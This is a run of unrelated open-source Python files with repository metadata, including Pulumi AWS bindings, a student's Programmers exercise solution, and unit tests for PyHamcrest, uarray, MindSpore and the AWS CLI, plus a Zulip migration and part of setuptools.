arns=self.arns,
id=self.id)
def get_sinks(opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSinksResult:
"""
Data source for managing an AWS CloudWatch Observability Access Manager Sinks.
## Example Usage
### Basic Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.oam.get_sinks()
```
"""
__args__ = dict()
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('aws:oam/getSinks:getSinks', __args__, opts=opts, typ=GetSinksResult).value
return AwaitableGetSinksResult(
arns=pulumi.get(__ret__, 'arns'),
id=pulumi.get(__ret__, 'id'))
|
34d0c4af9e45566377e35ea32e452f54a0c97565
|
3ca67d69abd4e74b7145b340cdda65532f90053b
|
/programmers/난이도별/level01.문자열_다루기_기본/HyeonJeong.py
|
fa9b20b4a111e7ec133d36eabf824fc242913358
|
[] |
no_license
|
DKU-STUDY/Algorithm
|
19549516984b52a1c5cd73e1ed1e58f774d6d30e
|
6f78efdbefd8eedab24e43d74c7dae7f95c2893b
|
refs/heads/master
| 2023-02-18T06:48:39.309641
| 2023-02-09T07:16:14
| 2023-02-09T07:16:14
| 258,455,710
| 175
| 49
| null | 2023-02-09T07:16:16
| 2020-04-24T08:42:27
|
Python
|
UTF-8
|
Python
| false
| false
| 279
|
py
|
HyeonJeong.py
|
def solution(s):
# 조건에 안맞는 것들을 바로 return 시키면 더 효율적인 코드가 됨.
if len(s) != 4 and 6 :
return False
for i in s :
if i not in "0123456789":
return False
return True
print(solution("a234"))
|
791f2276117c68c9e329371791dff814b392b319
|
5de2fda1683fd85ef9093d9cae4d18485e767da2
|
/tests/hamcrest_unit_test/collection/is_empty_test.py
|
44b5292f033cb4a41e1a1c68c847d028e017e7eb
|
[
"BSD-3-Clause"
] |
permissive
|
hamcrest/PyHamcrest
|
073fd46145290f3e932513abdd5d0471d85e4c7b
|
8f160f83762e011af93194c38e84be9d91012fe9
|
refs/heads/main
| 2023-08-31T07:42:35.980553
| 2023-08-30T20:27:48
| 2023-08-30T20:27:48
| 1,194,778
| 654
| 116
|
NOASSERTION
| 2023-08-30T20:27:49
| 2010-12-24T02:55:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,709
|
py
|
is_empty_test.py
|
from hamcrest.library.collection.is_empty import empty
from hamcrest_unit_test.matcher_test import MatcherTest
__author__ = "Chris Rose"
__copyright__ = "Copyright 2012 hamcrest.org"
__license__ = "BSD, see License.txt"
class LengthHaver(object):
def __init__(self, len_):
self._len = len_
def __len__(self):
return self._len
class EmptyCollectionTest(MatcherTest):
def testReturnsTrueForEmptyStandardCollections(self):
matcher = empty()
self.assert_matches("empty tuple", matcher, ())
self.assert_matches("empty list", matcher, [])
self.assert_matches("empty dictionary", matcher, {})
def testReturnsTrueForEmptyCollectionLike(self):
matcher = empty()
self.assert_matches("empty protocol object", matcher, LengthHaver(0))
def testReturnsFalseForNonEmptyStandardCollections(self):
matcher = empty()
self.assert_does_not_match("non-empty tuple", matcher, (1,))
self.assert_does_not_match("non-empty list", matcher, [1])
self.assert_does_not_match("empty dictionary", matcher, {1: 2})
def testReturnsFalseForNonEmptyCollectionLike(self):
matcher = empty()
self.assert_does_not_match("non-empty protocol object", matcher, LengthHaver(1))
def testHasReadableDescription(self):
self.assert_description("an empty collection", empty())
def testSuccessfulMatchDoesNotGenerateMismatchDescription(self):
self.assert_no_mismatch_description(empty(), [])
def testDescribeMismatch(self):
self.assert_mismatch_description("has 3 item(s)", empty(), [1, 2, 3])
self.assert_mismatch_description("does not support length", empty(), 1)
|
504d60577f7e55a15ee7f0b7e997a57afe74474e
|
8a40c574871927b120defd07b9b15bd78bceb09d
|
/uarray/tests/test_uarray.py
|
cacd9d192545b3a21d1e0a5716ef2b6c43f42b64
|
[
"BSD-3-Clause"
] |
permissive
|
Quansight-Labs/uarray
|
c2f677e78a88b6012816fd04caf1d6e314947806
|
d895d6821589a9b63a960b9912282ba2b1ce9553
|
refs/heads/master
| 2022-09-02T19:26:55.283378
| 2022-08-17T04:04:40
| 2022-08-17T04:04:40
| 145,463,966
| 101
| 31
|
BSD-3-Clause
| 2022-08-17T04:04:41
| 2018-08-20T19:53:58
|
C++
|
UTF-8
|
Python
| false
| false
| 15,173
|
py
|
test_uarray.py
|
import uarray as ua
import pickle
import pytest # type: ignore
@pytest.fixture(scope="function", autouse=True)
def cleanup_backends():
with ua.reset_state():
yield
class Backend:
__ua_domain__ = "ua_tests"
class DisableBackend:
def __init__(self, domain="ua_tests"):
self.__ua_domain__ = domain
self.active = True
self.ret = object()
def __ua_function__(self, f, a, kw):
if self.active:
return self.ret
raise ua.BackendNotImplementedError(self.__ua_domain__)
@pytest.fixture()
def nullary_mm():
return ua.generate_multimethod(lambda: (), lambda a, kw, d: (a, kw), "ua_tests")
def test_nestedbackend(nullary_mm):
obj = object()
be_outer = Backend()
be_outer.__ua_function__ = lambda f, a, kw: obj
def default(*a, **kw):
return nullary_mm(*a, **kw)
mm2 = ua.generate_multimethod(
lambda: (), lambda a, kw, d: (a, kw), "ua_tests", default=default
)
be_inner = Backend()
def be2_ua_func(f, a, kw):
with ua.skip_backend(be_inner):
return f(*a, **kw)
be_inner.__ua_function__ = be2_ua_func
with ua.set_backend(be_outer), ua.set_backend(be_inner):
assert mm2() is obj
def _replacer(args, kwargs, dispatchables):
return (args, kwargs)
@ua.create_multimethod(_replacer, "ua_tests")
def pickle_mm():
return ()
def test_pickle_support():
unpickle_mm = pickle.loads(pickle.dumps(pickle_mm))
assert unpickle_mm is pickle_mm
def test_registration(nullary_mm):
obj = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: obj
ua.register_backend(be)
assert nullary_mm() is obj
def test_global(nullary_mm):
obj = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: obj
ua.set_global_backend(be)
assert nullary_mm() is obj
def ctx_before_global(nullary_mm):
obj = object()
obj2 = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: obj
be2 = Backend()
be2.__ua_function__ = lambda f, a, kw: obj2
ua.set_global_backend(be)
with ua.set_backend(be2):
assert nullary_mm() is obj2
def test_global_before_registered(nullary_mm):
obj = object()
obj2 = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: obj
be2 = Backend()
be2.__ua_function__ = lambda f, a, kw: obj2
ua.set_global_backend(be)
ua.register_backend(be2)
assert nullary_mm() is obj
def test_global_try_last(nullary_mm):
obj = object()
obj2 = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: obj
be2 = Backend()
be2.__ua_function__ = lambda f, a, kw: obj2
ua.set_global_backend(be, try_last=True)
ua.register_backend(be2)
assert nullary_mm() is obj2
def test_global_only(nullary_mm):
obj = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: NotImplemented
be2 = Backend()
be2.__ua_function__ = lambda f, a, kw: obj
ua.set_global_backend(be, only=True)
ua.register_backend(be2)
with pytest.raises(ua.BackendNotImplementedError):
nullary_mm()
def test_clear_backends(nullary_mm):
obj = object()
obj2 = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: obj
be2 = Backend()
be2.__ua_function__ = lambda f, a, kw: obj2
ua.set_global_backend(be)
ua.register_backend(be2)
ua.clear_backends(Backend.__ua_domain__, registered=True, globals=True)
with pytest.raises(ua.BackendNotImplementedError):
nullary_mm()
def test_function_attrs():
def extractor():
return ()
def replacer(a, kw, d):
return a, kw
def default():
return NotImplemented
mm = ua.generate_multimethod(extractor, replacer, "ua_tests", default=default)
assert mm.arg_extractor is extractor
assert mm.arg_replacer is replacer
assert mm.default is default
assert mm.domain == "ua_tests"
def test_raising_from_backend(nullary_mm):
def raise_(foo):
raise foo
Foo = ua.BackendNotImplementedError("Foo")
be = Backend()
be.__ua_function__ = lambda f, a, kw: raise_(Foo)
# BackendNotImplementedErrors are nested
with ua.set_backend(be):
with pytest.raises(ua.BackendNotImplementedError) as e:
nullary_mm()
assert (
e.value.args[0]
== "No selected backends had an implementation for this function."
)
assert type(e.value.args[1]) == tuple
assert e.value.args[1] == (be, Foo)
Bar = ua.BackendNotImplementedError("Bar")
be2 = Backend()
be2.__ua_function__ = lambda f, a, kw: raise_(Bar)
# Errors are in the order the backends were tried
with ua.set_backend(be), ua.set_backend(be2):
with pytest.raises(ua.BackendNotImplementedError) as e:
nullary_mm()
assert e.value.args[1] == (be2, Bar)
assert e.value.args[2] == (be, Foo)
be3 = Backend()
be3.__ua_function__ = lambda f, a, kw: "Success"
# Can succeed after a backend has raised BackendNotImplementedError
with ua.set_backend(be3), ua.set_backend(be):
assert nullary_mm() == "Success"
def test_nested():
be = Backend()
be.__ua_function__ = lambda f, a, kw: None
ctx = ua.set_backend(be)
with ctx, ctx:
pass
def test_invalid():
be1 = Backend()
be1.__ua_function__ = lambda f, a, kw: None
be2 = Backend()
be2.__ua_function__ = lambda f, a, kw: None
ctx1 = ua.set_backend(be1)
ctx2 = ua.set_backend(be2)
with pytest.raises(RuntimeError):
try:
ctx1.__enter__()
try:
ctx2.__enter__()
finally:
ctx1.__exit__(None, None, None)
finally:
ctx2.__exit__(None, None, None)
def test_skip_comparison(nullary_mm):
be1 = Backend()
be1.__ua_function__ = lambda f, a, kw: None
class Backend2(Backend):
@staticmethod
def __ua_function__(f, a, kw):
pass
def __eq__(self, other):
return other is self or other is be1
with pytest.raises(ua.BackendNotImplementedError):
with ua.set_backend(be1), ua.skip_backend(Backend2()):
nullary_mm()
def test_skip_raises(nullary_mm):
be1 = Backend()
be1.__ua_function__ = lambda f, a, kw: None
foo = Exception("Foo")
class Backend2(Backend):
@staticmethod
def __ua_function__(f, a, kw):
pass
def __eq__(self, other):
raise foo
with pytest.raises(Exception) as e:
with ua.set_backend(be1), ua.skip_backend(Backend2()):
nullary_mm()
assert e.value is foo
def test_getset_state(cleanup_backends):
ua.set_global_backend(Backend())
ua.register_backend(Backend())
with ua.set_backend(Backend()), ua.skip_backend(Backend()):
state = ua.get_state()
pstate = state._pickle()
assert pstate != ua.get_state()._pickle()
with ua.set_state(state):
assert pstate[:2] == ua.get_state()._pickle()[:2]
class ComparableBackend(Backend):
def __init__(self, obj):
super().__init__()
self.obj = obj
def __eq__(self, other):
return isinstance(other, ComparableBackend) and self.obj == other.obj
def __ne__(self, other):
return not (self == other)
def test_pickle_state():
ua.set_global_backend(ComparableBackend("a"))
ua.register_backend(ComparableBackend("b"))
with ua.set_backend(ComparableBackend("c")), ua.skip_backend(
ComparableBackend("d")
):
state = ua.get_state()
state_loaded = pickle.loads(pickle.dumps(state))
assert state._pickle() == state_loaded._pickle()
def test_hierarchical_backends():
mm = ua.generate_multimethod(
lambda: (), lambda a, kw, d: (a, kw), "ua_tests.foo.bar"
)
subdomains = "ua_tests.foo.bar".split(".")
depth = len(subdomains)
mms = [
ua.generate_multimethod(
lambda: (), lambda a, kw, d: (a, kw), ".".join(subdomains[: i + 1])
)
for i in range(depth)
]
be = [DisableBackend(".".join(subdomains[: i + 1])) for i in range(depth)]
ua.set_global_backend(be[1])
with pytest.raises(ua.BackendNotImplementedError):
mms[0]()
for i in range(1, depth):
assert mms[i]() is be[1].ret
ua.set_global_backend(be[0])
for i in range(depth):
assert mms[i]() is be[min(i, 1)].ret
ua.set_global_backend(be[2])
for i in range(depth):
assert mms[i]() is be[i].ret
be[2].active = False
for i in range(depth):
print(i)
assert mms[i]() is be[min(i, 1)].ret
be[1].active = False
for i in range(depth):
assert mms[i]() is be[0].ret
be[0].active = False
for i in range(depth):
with pytest.raises(ua.BackendNotImplementedError):
mms[i]()
# only=True prevents all further domain checking
be[0].active = True
be[1].active = True
with ua.set_backend(be[2], only=True), pytest.raises(ua.BackendNotImplementedError):
mms[2]()
def test_multidomain_backends():
n_domains = 2
be = DisableBackend(domain=["ua_tests" + str(i) for i in range(n_domains)])
mms = [
ua.generate_multimethod(
lambda: (), lambda a, kw, d: (a, kw), "ua_tests" + str(i)
)
for i in range(n_domains)
]
def assert_no_backends():
for i in range(len(mms)):
with pytest.raises(ua.BackendNotImplementedError):
mms[i]()
def assert_backend_active(backend):
assert all(mms[i]() is backend.ret for i in range(len(mms)))
assert_no_backends()
with ua.set_backend(be):
assert_backend_active(be)
ua.set_global_backend(be)
assert_backend_active(be)
with ua.skip_backend(be):
assert_no_backends()
assert_backend_active(be)
for i in range(len(mms)):
ua.clear_backends(mms[i].domain, globals=True)
with pytest.raises(ua.BackendNotImplementedError):
mms[i]()
for j in range(i + 1, len(mms)):
assert mms[j]() is be.ret
assert_no_backends()
ua.register_backend(be)
assert_backend_active(be)
def test_determine_backend(nullary_mm):
class TypeA:
pass
class TypeB:
pass
mark = "determine_backend_test"
class TypeBackend:
__ua_domain__ = "ua_tests"
def __init__(self, my_type):
self.my_type = my_type
def __ua_convert__(self, dispatchables, coerce):
if not all(
type(d.value) is self.my_type and d.type is mark for d in dispatchables
):
return NotImplemented
return tuple(d.value for d in dispatchables)
def __ua_function__(self, func, args, kwargs):
return self.my_type
BackendA = TypeBackend(TypeA)
BackendB = TypeBackend(TypeB)
with ua.set_backend(BackendA), pytest.raises(ua.BackendNotImplementedError):
with ua.determine_backend(TypeB(), mark, domain="ua_tests"):
pass
with ua.set_backend(BackendA), ua.set_backend(BackendB):
with ua.determine_backend(TypeA(), mark, domain="ua_tests"):
assert nullary_mm() is TypeA
with ua.determine_backend(TypeB(), mark, domain="ua_tests"):
assert nullary_mm() is TypeB
# Has no __ua_convert__, so assumed to not accept the type
with ua.set_backend(DisableBackend()), pytest.raises(ua.BackendNotImplementedError):
with ua.determine_backend(TypeB(), mark, domain="ua_tests"):
pass
with ua.set_backend(BackendA), ua.set_backend(BackendB):
with pytest.raises(ua.BackendNotImplementedError):
with ua.determine_backend_multi(
[ua.Dispatchable(TypeA(), mark), ua.Dispatchable(TypeB(), mark)],
domain="ua_tests",
):
pass
with ua.determine_backend_multi(
[ua.Dispatchable(TypeA(), mark), ua.Dispatchable(TypeA(), mark)],
domain="ua_tests",
):
assert nullary_mm() is TypeA
def test_determine_backend_coerce(nullary_mm):
class TypeA:
pass
class TypeB:
pass
mark = "determine_backend_test"
class TypeBackend:
__ua_domain__ = "ua_tests"
def __init__(self, my_type):
self.my_type = my_type
def __ua_convert__(self, dispatchables, coerce):
if len(dispatchables) > 0:
print(dispatchables[0], coerce)
if coerce and all(d.coercible for d in dispatchables):
return tuple(self.my_type() for _ in dispatchables)
if not all(
type(d.value) is self.my_type and d.type is mark for d in dispatchables
):
return NotImplemented
return tuple(d.value for d in dispatchables)
def __ua_function__(self, func, args, kwargs):
return self.my_type
BackendA = TypeBackend(TypeA)
BackendB = TypeBackend(TypeB)
unary_mm = ua.generate_multimethod(
lambda a: (ua.Dispatchable(a, mark),), lambda a, kw, d: (d, kw), "ua_tests"
)
# coercion is not forced on the existing set backend
with ua.set_backend(BackendA), ua.set_backend(BackendB):
with ua.determine_backend(TypeA(), mark, domain="ua_tests", coerce=True):
assert nullary_mm() is TypeA
assert unary_mm(TypeB()) is TypeA
# But is allowed if the backend was set with coerce in the first place
with ua.set_backend(BackendA), ua.set_backend(BackendB, coerce=True):
with ua.determine_backend(TypeA(), mark, domain="ua_tests", coerce=True):
assert nullary_mm() is TypeB
assert unary_mm(TypeA()) is TypeB
def test_default(nullary_mm):
obj = object()
be = Backend()
be.__ua_function__ = lambda f, a, kw: NotImplemented
# If a backend returns NotImplemented, the default is called
def default1(*a, **kw):
return obj
mm1 = ua.generate_multimethod(
lambda: (), lambda a, kw, d: (a, kw), "ua_tests", default=default1
)
with ua.set_backend(be):
assert mm1() is obj
# If all backends fail, the default is called again without a specific backend
num_calls = [0]
def default2(*a, **kw):
num_calls[0] = num_calls[0] + 1
raise ua.BackendNotImplementedError()
mm2 = ua.generate_multimethod(
lambda: (), lambda a, kw, d: (a, kw), "ua_tests", default=default2
)
with ua.set_backend(be), pytest.raises(ua.BackendNotImplementedError):
mm2()
assert num_calls[0] == 2
# If the last backend is set as only or coerce, the last default call is skipped
num_calls[0] = 0
with ua.set_backend(be, only=True), pytest.raises(ua.BackendNotImplementedError):
mm2()
assert num_calls[0] == 1
num_calls[0] = 0
with ua.set_backend(be, coerce=True), pytest.raises(ua.BackendNotImplementedError):
mm2()
assert num_calls[0] == 1
|
fef208a02f614e3bd34b75d95a5a4bb1428bf9a8
|
ffdc77394c5b5532b243cf3c33bd584cbdc65cb7
|
/tests/ut/python/nn/probability/distribution/test_categorical.py
|
fa8598b879eb63880699a7c9e240db655e109cf2
|
[
"Apache-2.0",
"LicenseRef-scancode-proprietary-license",
"MPL-1.0",
"OpenSSL",
"LGPL-3.0-only",
"LicenseRef-scancode-warranty-disclaimer",
"BSD-3-Clause-Open-MPI",
"MIT",
"MPL-2.0-no-copyleft-exception",
"NTP",
"BSD-3-Clause",
"GPL-1.0-or-later",
"0BSD",
"MPL-2.0",
"LicenseRef-scancode-free-unknown",
"AGPL-3.0-only",
"Libpng",
"MPL-1.1",
"IJG",
"GPL-2.0-only",
"BSL-1.0",
"Zlib",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-python-cwi",
"BSD-2-Clause",
"LicenseRef-scancode-gary-s-brown",
"LGPL-2.1-only",
"LicenseRef-scancode-other-permissive",
"Python-2.0",
"LicenseRef-scancode-mit-nagy",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense"
] |
permissive
|
mindspore-ai/mindspore
|
ca7d5bb51a3451c2705ff2e583a740589d80393b
|
54acb15d435533c815ee1bd9f6dc0b56b4d4cf83
|
refs/heads/master
| 2023-07-29T09:17:11.051569
| 2023-07-17T13:14:15
| 2023-07-17T13:14:15
| 239,714,835
| 4,178
| 768
|
Apache-2.0
| 2023-07-26T22:31:11
| 2020-02-11T08:43:48
|
C++
|
UTF-8
|
Python
| false
| false
| 8,014
|
py
|
test_categorical.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
Test nn.probability.distribution.Categorical.
"""
import numpy as np
import pytest
import mindspore.nn as nn
import mindspore.nn.probability.distribution as msd
from mindspore import dtype
from mindspore import Tensor
from mindspore import context
skip_flag = context.get_context("device_target") == "CPU"
def test_arguments():
"""
Args passing during initialization.
"""
c = msd.Categorical()
assert isinstance(c, msd.Distribution)
c = msd.Categorical([0.1, 0.9], dtype=dtype.int32)
assert isinstance(c, msd.Distribution)
def test_type():
with pytest.raises(TypeError):
msd.Categorical([0.1], dtype=dtype.bool_)
def test_name():
with pytest.raises(TypeError):
msd.Categorical([0.1], name=1.0)
def test_seed():
with pytest.raises(TypeError):
msd.Categorical([0.1], seed='seed')
def test_prob():
"""
Invalid probability.
"""
with pytest.raises(ValueError):
msd.Categorical([-0.1], dtype=dtype.int32)
with pytest.raises(ValueError):
msd.Categorical([1.1], dtype=dtype.int32)
with pytest.raises(ValueError):
msd.Categorical([0.0], dtype=dtype.int32)
with pytest.raises(ValueError):
msd.Categorical([1.0], dtype=dtype.int32)
def test_categorical_sum():
"""
Invalid probabilities.
"""
with pytest.raises(ValueError):
msd.Categorical([[0.1, 0.2], [0.4, 0.6]], dtype=dtype.int32)
with pytest.raises(ValueError):
msd.Categorical([[0.5, 0.7], [0.6, 0.6]], dtype=dtype.int32)
def rank():
"""
Rank dimenshion less than 1.
"""
with pytest.raises(ValueError):
msd.Categorical(0.2, dtype=dtype.int32)
with pytest.raises(ValueError):
msd.Categorical(np.array(0.3).astype(np.float32), dtype=dtype.int32)
with pytest.raises(ValueError):
msd.Categorical(
Tensor(np.array(0.3).astype(np.float32)), dtype=dtype.int32)
class CategoricalProb(nn.Cell):
"""
Categorical distribution: initialize with probs.
"""
def __init__(self):
super(CategoricalProb, self).__init__()
self.c = msd.Categorical([0.7, 0.3], dtype=dtype.int32)
def construct(self, value):
prob = self.c.prob(value)
log_prob = self.c.log_prob(value)
cdf = self.c.cdf(value)
log_cdf = self.c.log_cdf(value)
sf = self.c.survival_function(value)
log_sf = self.c.log_survival(value)
return prob + log_prob + cdf + log_cdf + sf + log_sf
@pytest.mark.skipif(skip_flag, reason="not support running in CPU")
def test_categorical_prob():
"""
Test probability functions: passing value through construct.
"""
net = CategoricalProb()
value = Tensor([0, 1, 0, 1, 0], dtype=dtype.float32)
ans = net(value)
assert isinstance(ans, Tensor)
class CategoricalProb1(nn.Cell):
"""
Categorical distribution: initialize without probs.
"""
def __init__(self):
super(CategoricalProb1, self).__init__()
self.c = msd.Categorical(dtype=dtype.int32)
def construct(self, value, probs):
prob = self.c.prob(value, probs)
log_prob = self.c.log_prob(value, probs)
cdf = self.c.cdf(value, probs)
log_cdf = self.c.log_cdf(value, probs)
sf = self.c.survival_function(value, probs)
log_sf = self.c.log_survival(value, probs)
return prob + log_prob + cdf + log_cdf + sf + log_sf
@pytest.mark.skipif(skip_flag, reason="not support running in CPU")
def test_categorical_prob1():
"""
Test probability functions: passing value/probs through construct.
"""
net = CategoricalProb1()
value = Tensor([0, 1, 0, 1, 0], dtype=dtype.float32)
probs = Tensor([0.3, 0.7], dtype=dtype.float32)
ans = net(value, probs)
assert isinstance(ans, Tensor)
class CategoricalKl(nn.Cell):
"""
Test class: kl_loss between Categorical distributions.
"""
def __init__(self):
super(CategoricalKl, self).__init__()
self.c1 = msd.Categorical([0.2, 0.2, 0.6], dtype=dtype.int32)
self.c2 = msd.Categorical(dtype=dtype.int32)
def construct(self, probs_b, probs_a):
kl1 = self.c1.kl_loss('Categorical', probs_b)
kl2 = self.c2.kl_loss('Categorical', probs_b, probs_a)
return kl1 + kl2
@pytest.mark.skipif(skip_flag, reason="not support running in CPU")
def test_kl():
"""
Test kl_loss function.
"""
ber_net = CategoricalKl()
probs_b = Tensor([0.3, 0.1, 0.6], dtype=dtype.float32)
probs_a = Tensor([0.7, 0.2, 0.1], dtype=dtype.float32)
ans = ber_net(probs_b, probs_a)
assert isinstance(ans, Tensor)
class CategoricalCrossEntropy(nn.Cell):
"""
Test class: cross_entropy of Categorical distribution.
"""
def __init__(self):
super(CategoricalCrossEntropy, self).__init__()
self.c1 = msd.Categorical([0.1, 0.7, 0.2], dtype=dtype.int32)
self.c2 = msd.Categorical(dtype=dtype.int32)
def construct(self, probs_b, probs_a):
h1 = self.c1.cross_entropy('Categorical', probs_b)
h2 = self.c2.cross_entropy('Categorical', probs_b, probs_a)
return h1 + h2
@pytest.mark.skipif(skip_flag, reason="not support running in CPU")
def test_cross_entropy():
"""
Test cross_entropy between Categorical distributions.
"""
net = CategoricalCrossEntropy()
probs_b = Tensor([0.3, 0.1, 0.6], dtype=dtype.float32)
probs_a = Tensor([0.7, 0.2, 0.1], dtype=dtype.float32)
ans = net(probs_b, probs_a)
assert isinstance(ans, Tensor)
class CategoricalConstruct(nn.Cell):
"""
Categorical distribution: going through construct.
"""
def __init__(self):
super(CategoricalConstruct, self).__init__()
self.c = msd.Categorical([0.1, 0.8, 0.1], dtype=dtype.int32)
self.c1 = msd.Categorical(dtype=dtype.int32)
def construct(self, value, probs):
prob = self.c('prob', value)
prob1 = self.c('prob', value, probs)
prob2 = self.c1('prob', value, probs)
return prob + prob1 + prob2
@pytest.mark.skipif(skip_flag, reason="not support running in CPU")
def test_categorical_construct():
"""
Test probability function going through construct.
"""
net = CategoricalConstruct()
value = Tensor([0, 1, 2, 0, 0], dtype=dtype.float32)
probs = Tensor([0.5, 0.4, 0.1], dtype=dtype.float32)
ans = net(value, probs)
assert isinstance(ans, Tensor)
class CategoricalBasics(nn.Cell):
"""
Test class: basic mean/var/mode/entropy function.
"""
def __init__(self):
super(CategoricalBasics, self).__init__()
self.c = msd.Categorical([0.2, 0.7, 0.1], dtype=dtype.int32)
self.c1 = msd.Categorical(dtype=dtype.int32)
def construct(self, probs):
basics1 = self.c.mean() + self.c.var() + self.c.mode() + self.c.entropy()
basics2 = self.c1.mean(probs) + self.c1.var(probs) +\
self.c1.mode(probs) + self.c1.entropy(probs)
return basics1 + basics2
@pytest.mark.skipif(skip_flag, reason="not support running in CPU")
def test_basics():
"""
Test basics functionality of Categorical distribution.
"""
net = CategoricalBasics()
probs = Tensor([0.7, 0.2, 0.1], dtype=dtype.float32)
ans = net(probs)
assert isinstance(ans, Tensor)
|
a4fc7c5a8599e10ea4b3c0a74333e04ad5bd7b98
|
952dc66c61966f099756cdb6c2d13b40352f63cc
|
/zerver/migrations/0044_reaction.py
|
6d2db44e49eb660b6e4d0e247233f336bf39150a
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
zulip/zulip
|
5ae6aad35fd9f72996c0a2a9cdd674400966ebf6
|
965a25d91b6ee2db54038f5df855215fa25146b0
|
refs/heads/main
| 2023-08-28T23:43:00.971110
| 2023-08-28T16:47:09
| 2023-08-28T19:33:02
| 43,160,685
| 20,239
| 8,996
|
Apache-2.0
| 2023-09-14T20:57:47
| 2015-09-25T16:37:25
|
Python
|
UTF-8
|
Python
| false
| false
| 1,272
|
py
|
0044_reaction.py
|
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("zerver", "0043_realm_filter_validators"),
]
operations = [
migrations.CreateModel(
name="Reaction",
fields=[
(
"id",
models.AutoField(
verbose_name="ID", serialize=False, auto_created=True, primary_key=True
),
),
(
"user_profile",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL
),
),
(
"message",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="zerver.Message"
),
),
("emoji_name", models.TextField()),
],
bases=(models.Model,),
),
migrations.AlterUniqueTogether(
name="reaction",
unique_together={("user_profile", "message", "emoji_name")},
),
]
|
fcc405bf3c35535b8fde695aba3facaccfa1926e
|
ad61cc119a42abfd3d64224a753817ae0f9ba058
|
/tests/functional/elb/test_configure_health_check.py
|
67fb1d75ef9744998cb26dd770610cfe0747d2d9
|
[
"Apache-2.0"
] |
permissive
|
aws/aws-cli
|
30b0e5b0fb6d736f1540990955f0a7351ee7a908
|
147d16dfdb72dc9cf362b676a57e46a49375afbd
|
refs/heads/develop
| 2023-09-03T19:52:07.955543
| 2023-09-01T20:37:50
| 2023-09-01T20:37:50
| 6,780,767
| 13,038
| 4,107
|
NOASSERTION
| 2023-09-13T19:48:11
| 2012-11-20T16:07:36
|
Python
|
UTF-8
|
Python
| false
| false
| 2,737
|
py
|
test_configure_health_check.py
|
#!/usr/bin/env python
# Copyright 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from awscli.testutils import BaseAWSCommandParamsTest
class TestConfigureHealthCheck(BaseAWSCommandParamsTest):
prefix = 'elb configure-health-check'
def test_shorthand_basic(self):
cmdline = self.prefix
cmdline += ' --load-balancer-name my-lb'
cmdline += (' --health-check Target=HTTP:80/weather/us/wa/seattle,'
'Interval=300,Timeout=60,UnhealthyThreshold=5,'
'HealthyThreshold=9')
result = {
'HealthCheck': {
'HealthyThreshold': 9,
'Interval': 300,
'Target': 'HTTP:80/weather/us/wa/seattle',
'Timeout': 60,
'UnhealthyThreshold': 5},
'LoadBalancerName': 'my-lb'}
self.assert_params_for_cmd(cmdline, result)
def test_json(self):
cmdline = self.prefix
cmdline += ' --load-balancer-name my-lb '
cmdline += ('--health-check {"Target":"HTTP:80/weather/us/wa/seattle'
'?a=b","Interval":300,"Timeout":60,'
'"UnhealthyThreshold":5,"HealthyThreshold":9}')
result = {
'HealthCheck': {
'HealthyThreshold': 9,
'Interval': 300,
'Target': 'HTTP:80/weather/us/wa/seattle?a=b',
'Timeout': 60,
'UnhealthyThreshold': 5},
'LoadBalancerName': 'my-lb'}
self.assert_params_for_cmd(cmdline, result)
def test_shorthand_with_multiple_equals_for_value(self):
cmdline = self.prefix
cmdline += ' --load-balancer-name my-lb'
cmdline += (
' --health-check Target="HTTP:80/weather/us/wa/seattle?a=b"'
',Interval=300,Timeout=60,UnhealthyThreshold=5,'
'HealthyThreshold=9'
)
result = {
'HealthCheck': {
'HealthyThreshold': 9,
'Interval': 300,
'Target': 'HTTP:80/weather/us/wa/seattle?a=b',
'Timeout': 60,
'UnhealthyThreshold': 5},
'LoadBalancerName': 'my-lb'}
self.assert_params_for_cmd(cmdline, result)
|
b278f91f6018268cbf5eef74c773bedc12ea3369
|
010279e2ba272d09e9d2c4e903722e5faba2cf7a
|
/contrib/python/setuptools/py3/setuptools/_imp.py
|
9d4ead0eb036be85c7681c74ef933969de0a6ceb
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
catboost/catboost
|
854c1a1f439a96f1ae6b48e16644be20aa04dba2
|
f5042e35b945aded77b23470ead62d7eacefde92
|
refs/heads/master
| 2023-09-01T12:14:14.174108
| 2023-09-01T10:01:01
| 2023-09-01T10:22:12
| 97,556,265
| 8,012
| 1,425
|
Apache-2.0
| 2023-09-11T03:32:32
| 2017-07-18T05:29:04
|
Python
|
UTF-8
|
Python
| false
| false
| 2,433
|
py
|
_imp.py
|
"""
Re-implementation of find_module and get_frozen_object
from the deprecated imp module.
"""
import os
import importlib.util
import importlib.machinery
from importlib.util import module_from_spec
PY_SOURCE = 1
